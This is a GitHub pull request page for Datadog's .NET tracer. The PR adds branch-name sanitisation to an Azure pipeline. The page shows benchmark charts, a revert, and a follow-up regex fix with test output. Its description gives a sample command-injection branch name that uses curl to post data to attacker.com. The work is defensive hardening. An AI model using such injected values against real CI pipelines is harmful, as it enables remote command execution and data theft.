[SINT-4157] sanitise ultimate-pipeline.yml #7582
Merged
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
github-actions
bot
added
the
area:builds
ikraemer-dd
force-pushed
the
ikraemer/SINT-4157-sanitize-azure-pipeline
branch
from
afdefc8 to
5dd649a
Compare
Execution-Time Benchmarks Report ⏱️Execution-time results for samples comparing the following branches/commits: Execution-time benchmarks measure the whole time it takes to execute a program. And are intended to measure the one-off costs. Cases where the execution time results for the PR are worse than latest master results are shown in red. The following thresholds were used for comparing the execution times:
Note that these results are based on a single point-in-time result for each branch. For full results, see the dashboard. Graphs show the p99 interval based on the mean and StdDev of the test run, as well as the mean value of the run (shown as a diamond below the graph). gantt
title Execution time (ms) FakeDbCommand (.NET Framework 4.8)
dateFormat X
axisFormat %s
todayMarker off
section Bailout
This PR (7582) - mean (90ms) : 80, 101
. : milestone, 90,
master - mean (90ms) : 81, 100
. : milestone, 90,
section Baseline
This PR (7582) - mean (84ms) : 73, 95
. : milestone, 84,
master - mean (83ms) : 73, 92
. : milestone, 83,
section CallTarget+Inlining+NGEN
This PR (7582) - mean (1,164ms) : 1016, 1313
. : milestone, 1164,
master - mean (1,188ms) : 1091, 1286
. : milestone, 1188,
gantt
title Execution time (ms) FakeDbCommand (.NET Core 3.1)
dateFormat X
axisFormat %s
todayMarker off
section Bailout
This PR (7582) - mean (124ms) : 121, 126
. : milestone, 124,
master - mean (128ms) : 116, 140
. : milestone, 128,
section Baseline
This PR (7582) - mean (123ms) : 119, 127
. : milestone, 123,
master - mean (126ms) : 115, 137
. : milestone, 126,
section CallTarget+Inlining+NGEN
This PR (7582) - mean (820ms) : 785, 856
. : milestone, 820,
master - mean (810ms) : 724, 897
. : milestone, 810,
gantt
title Execution time (ms) FakeDbCommand (.NET 6)
dateFormat X
axisFormat %s
todayMarker off
section Bailout
This PR (7582) - mean (122ms) : crit, 105, 140
. : crit, milestone, 122,
master - mean (110ms) : 96, 123
. : milestone, 110,
section Baseline
This PR (7582) - mean (113ms) : 101, 125
. : milestone, 113,
master - mean (106ms) : 98, 115
. : milestone, 106,
section CallTarget+Inlining+NGEN
This PR (7582) - mean (846ms) : 770, 921
. : milestone, 846,
master - mean (818ms) : 748, 888
. : milestone, 818,
gantt
title Execution time (ms) FakeDbCommand (.NET 8)
dateFormat X
axisFormat %s
todayMarker off
section Bailout
This PR (7582) - mean (121ms) : crit, 111, 131
. : crit, milestone, 121,
master - mean (99ms) : 91, 108
. : milestone, 99,
section Baseline
This PR (7582) - mean (107ms) : 95, 118
. : milestone, 107,
master - mean (96ms) : 89, 104
. : milestone, 96,
section CallTarget+Inlining+NGEN
This PR (7582) - mean (731ms) : 661, 802
. : milestone, 731,
master - mean (710ms) : 633, 787
. : milestone, 710,
gantt
title Execution time (ms) HttpMessageHandler (.NET Framework 4.8)
dateFormat X
axisFormat %s
todayMarker off
section Bailout
This PR (7582) - mean (212ms) : 199, 224
. : milestone, 212,
master - mean (215ms) : 195, 234
. : milestone, 215,
section Baseline
This PR (7582) - mean (205ms) : 192, 218
. : milestone, 205,
master - mean (214ms) : 195, 233
. : milestone, 214,
section CallTarget+Inlining+NGEN
This PR (7582) - mean (1,244ms) : 1143, 1345
. : milestone, 1244,
master - mean (1,278ms) : 1184, 1372
. : milestone, 1278,
gantt
title Execution time (ms) HttpMessageHandler (.NET Core 3.1)
dateFormat X
axisFormat %s
todayMarker off
section Bailout
This PR (7582) - mean (305ms) : 283, 326
. : milestone, 305,
master - mean (304ms) : 282, 327
. : milestone, 304,
section Baseline
This PR (7582) - mean (301ms) : 278, 324
. : milestone, 301,
master - mean (307ms) : 280, 335
. : milestone, 307,
section CallTarget+Inlining+NGEN
This PR (7582) - mean (1,010ms) : 949, 1072
. : milestone, 1010,
master - mean (1,040ms) : 968, 1112
. : milestone, 1040,
gantt
title Execution time (ms) HttpMessageHandler (.NET 6)
dateFormat X
axisFormat %s
todayMarker off
section Bailout
This PR (7582) - mean (305ms) : 288, 322
. : milestone, 305,
master - mean (306ms) : 286, 327
. : milestone, 306,
section Baseline
This PR (7582) - mean (305ms) : 284, 325
. : milestone, 305,
master - mean (309ms) : 282, 336
. : milestone, 309,
section CallTarget+Inlining+NGEN
This PR (7582) - mean (1,058ms) : 993, 1123
. : milestone, 1058,
master - mean (1,050ms) : 964, 1136
. : milestone, 1050,
gantt
title Execution time (ms) HttpMessageHandler (.NET 8)
dateFormat X
axisFormat %s
todayMarker off
section Bailout
This PR (7582) - mean (296ms) : 273, 318
. : milestone, 296,
master - mean (291ms) : 270, 312
. : milestone, 291,
section Baseline
This PR (7582) - mean (294ms) : 269, 319
. : milestone, 294,
master - mean (290ms) : 272, 308
. : milestone, 290,
section CallTarget+Inlining+NGEN
This PR (7582) - mean (947ms) : 847, 1047
. : milestone, 947,
master - mean (932ms) : 837, 1026
. : milestone, 932,
|
bouwkast
approved these changes
Sep 30, 2025
link04
pushed a commit
that referenced
this pull request
Oct 6, 2025
Reverts #7582 This is preventing us to run the action as expected as the regex appears to be incorrect. Since we must trigger this ourselves there really isn't a risk here at the moment, will let the SINT team follow up to resolve. This is blocking the testing of #7514 https://dev.azure.com/datadoghq/dd-trace-dotnet/_build/results?buildId=188595&view=logs&j=8299a7f3-61e2-5626-a12e-85b7b20deab1&t=e26f8d61-df24-5d93-564c-322f7221200d
ikraemer-dd
added a commit
that referenced
this pull request
Oct 8, 2025
## Summary of changes ## Reason for change Follow-up of #7582, that got reverted in #7627. The present PR updates the regular expression: the hyphen should be at the end or escaped to avoid being interpreted as a range operator. ## Implementation details From [source](https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap09.html): > The <hyphen-minus> character shall be treated as itself if it occurs first (after an initial '^', if any) or last in the list, or as an ending range point in a range expression. ## Test coverage Tested locally with this script [test-branch-name.sh](https://github.com/user-attachments/files/22740574/test-branch-name.sh) and got the following result, which reproduces the error in the PR and validates the fix from this PR. In particular: `maximo/otel-metrics-api-exporter` and `maximo/otel-metrics-api-exporter.` are authorized patterns, while `maximo/otel-metrics-api-exporter\;` is not. Test results confirm that the corrected regex now implements this behavior correctly ``` $ bash ./test-branch-name.sh maximo/otel-metrics-api-exporter Handling maximo/otel-metrics-api-exporter reverted regex NOT matched (branch name deemed UNSAFE, will exit) corrected regex matched (branch name deemed safe) $ bash ./test-branch-name.sh maximo/otel-metrics-api-exporter. Handling maximo/otel-metrics-api-exporter. reverted regex NOT matched (branch name deemed UNSAFE, will exit) corrected regex matched (branch name deemed safe) $ bash ./test-branch-name.sh maximo/otel-metrics-api-exporter\; Handling maximo/otel-metrics-api-exporter; reverted regex NOT matched (branch name deemed UNSAFE, will exit) corrected regex NOT matched (branch name deemed UNSAFE, will exit) ``` ## Other details <!-- Fixes #{issue} --> <!--⚠️ Note: Where possible, please obtain 2 approvals prior to merging. Unless CODEOWNERS specifies otherwise, for external teams it is typically best to have one review from a team member, and one review from apm-dotnet. Trivial changes do not require 2 reviews. MergeQueue is NOT enabled in this repository. If you have write access to the repo, the PR has 1-2 approvals (see above), and all of the required checks have passed, you can use the Squash and Merge button to merge the PR. If you don't have write access, or you need help, reach out in the #apm-dotnet channel in Slack. -->
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Summary of changes
Follow-up of #7579
Reason for change
upload_container_images.uploadjob is executed for PR (with a specific label). An attacker can create a PR with a carefully branch name that can result in command injection. Such a branch name can betest\",\"malicious\":\"$(curl -X POST https://attacker.com/steal-data)\"Implementation details
Test coverage
Other details